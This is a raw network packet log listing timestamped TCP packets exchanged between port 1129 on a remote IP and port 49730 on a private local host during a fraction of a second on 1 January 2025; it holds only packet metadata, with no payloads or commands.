Jan 1, 2025 18:10:02.488055944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488132954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488137007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488146067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488197088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488224030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488234997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488393068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488401890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488409996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488409996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488426924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488440037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488450050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488456964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488477945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488508940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488786936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488797903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488816023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488826036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488843918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488845110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.488862991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489025116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489047050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489065886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489068985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489078999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489094019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489115953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489125013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489365101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489376068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489392996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489406109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489454031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489454031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489609957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489620924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489670992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489757061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489773035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489785910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489800930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489809036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489814997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489829063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489837885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.489845991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.489865065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490195036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490206003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490222931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490232944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490245104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490251064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490272999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490324020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490490913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490502119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490587950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490598917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490609884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490616083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490628958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490638971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490643978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490658045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490667105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.490669012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.490703106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491213083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491224051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491240978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491250992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491266012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491267920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491278887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491283894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491290092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491296053 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491308928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491331100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491331100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491344929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491355896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491369963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491369009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491375923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.491386890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.491432905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.517494917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517518044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517529964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517540932 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.517575979 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.517661095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517672062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517693996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517704010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517719030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.517755985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.517877102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517885923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.517935038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.551708937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551719904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551738977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551769972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551812887 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.551901102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551911116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551927090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551953077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.551953077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.551974058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.551986933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.552278042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.554341078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554390907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554399967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554442883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.554486990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554497957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554511070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.554586887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554595947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554605007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.554613113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554692984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.554702044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.554815054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.576699972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.576744080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.576754093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.576816082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.576842070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.576880932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.576891899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577013969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577020884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577032089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577150106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577224016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577234030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577251911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577263117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577275991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577276945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577292919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577306032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577316046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577477932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577503920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577564001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577574968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577593088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577601910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577617884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577619076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577635050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577657938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.577892065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577903032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.577919006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.580964088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.580995083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.581007957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581022024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581099987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581108093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581193924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581204891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581219912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.581301928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.581372976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.581382990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.582046986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.587641954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587687969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587698936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587833881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587845087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587862015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.587862968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587873936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.587887049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588040113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588064909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588089943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588102102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588119984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588144064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588305950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588500977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588510036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588527918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588530064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588541031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588555098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588556051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588571072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588578939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588596106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588766098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588867903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588882923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588892937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588911057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588922977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588932991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588937044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588943005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.588953018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.588975906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.589369059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589380980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589400053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589413881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589427948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589447021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589462042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.589467049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589481115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589490891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.589499950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589504957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.589962006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589972973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.589983940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.589992046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590003967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590018034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590022087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590033054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590045929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590050936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590064049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590073109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590081930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590639114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590681076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590692043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590709925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590722084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590732098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590737104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590744972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590754032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590764999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590780020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590785027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590795994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590807915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590812922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590827942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590837955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590851068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590854883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.590864897 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.590872049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.591065884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.591521025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.591536999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.591552973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.591569901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.591590881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.591629982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.604242086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604283094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604295969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604322910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.604377031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.604480028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604491949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604535103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604545116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.604561090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.605143070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.638564110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638619900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638631105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638748884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638758898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638773918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.638870001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638885021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.638892889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.639548063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.641154051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641207933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641222000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641273975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.641273975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.641385078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641396046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641520023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641530037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.641545057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.642386913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.663542032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663568020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663587093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663611889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.663638115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663650036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663693905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.663753033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663763046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663897991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663902044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.663908958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663924932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663939953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.663942099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663958073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.663964987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664037943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664119959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664132118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664196014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664202929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664213896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664252996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664345026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664355993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664376974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664386988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664402008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664402962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.664426088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.664572954 CET	1129	49730	45.200.148.158	192.168.2.4
